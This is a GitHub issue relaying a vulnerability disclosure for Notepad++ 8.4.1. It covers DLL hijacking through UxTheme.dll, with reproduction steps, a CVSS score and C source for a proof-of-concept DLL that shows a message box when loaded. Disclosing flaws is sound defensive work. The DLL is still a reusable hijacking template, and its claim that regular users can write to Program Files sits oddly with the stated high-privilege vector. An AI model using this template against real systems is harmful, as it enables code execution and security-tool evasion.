[Security Vulnerability]: Notepad++ is exposed to CWE-427 #12113
Description
@donho, we received an email sometime back from Mend Software about the security issue found in Notepad++. You might have over looked it. Hence, I am creating this Jira and will create PR too.
I am pasting content from email and attachment in this issue for tracking purpose.
=================================================================
Application: Notepad++
Module: Notepad++
Vulnerability: DLL hijacking
Version: 8.4.1 (64bit)
Vulnerability Description:
Notepad++ versions 8.4.1 and before are vulnerable to DLL hijacking where an attacker can
replace the vulnerable dll (UxTheme.dll) with his own dll and run arbitrary code in the context
of Notepad++. This technique will allow the attacker to evade EDR and AV.
The attacker can replace the mentioned dll as the application runs from “c:\program files\” path
which regular users have write/edit permissions.
Steps to reproduce:
- Compile the attached source code DLL file.
- Rename the compiled DLL file to ‘UxTheme.dll’ and copy both ‘notepad++.exe’ and
‘UxTheme.dll’ files to a new folder. - Run ‘notepad++.exe’ and watch the messagebox.
CVSS 3.1 Vector:
CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
CVSS 3.1 Score:
6.5
CWE List:
CWE-427: Uncontrolled Search Path Element
=================================================================
Source code
#include <windows.h>
int Main() {
MessageBoxW(0, L"DLL Hijacking", L"Hello", 0);
return 1;
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
__declspec(dllexport) void OpenThemeData() { Main(); }
__declspec(dllexport) void CloseThemeData() {}
__declspec(dllexport) void DrawThemeBackground() {}
__declspec(dllexport) void GetThemeBackgroundContentRect(){}
__declspec(dllexport) void GetThemePartSize(){}
__declspec(dllexport) void GetThemeFont(){}
__declspec(dllexport) void SetWindowTheme(){}
__declspec(dllexport) void EnableThemeDialogTexture(){ Main(); }
__declspec(dllexport) void DrawThemeParentBackground(){}
__declspec(dllexport) void GetThemeTransitionDuration(){}
__declspec(dllexport) void BufferedPaintRenderAnimation(){}
__declspec(dllexport) void EndBufferedAnimation(){}
__declspec(dllexport) void BeginBufferedAnimation(){}
__declspec(dllexport) void BufferedPaintStopAllAnimations(){}
__declspec(dllexport) void DrawThemeTextEx(){}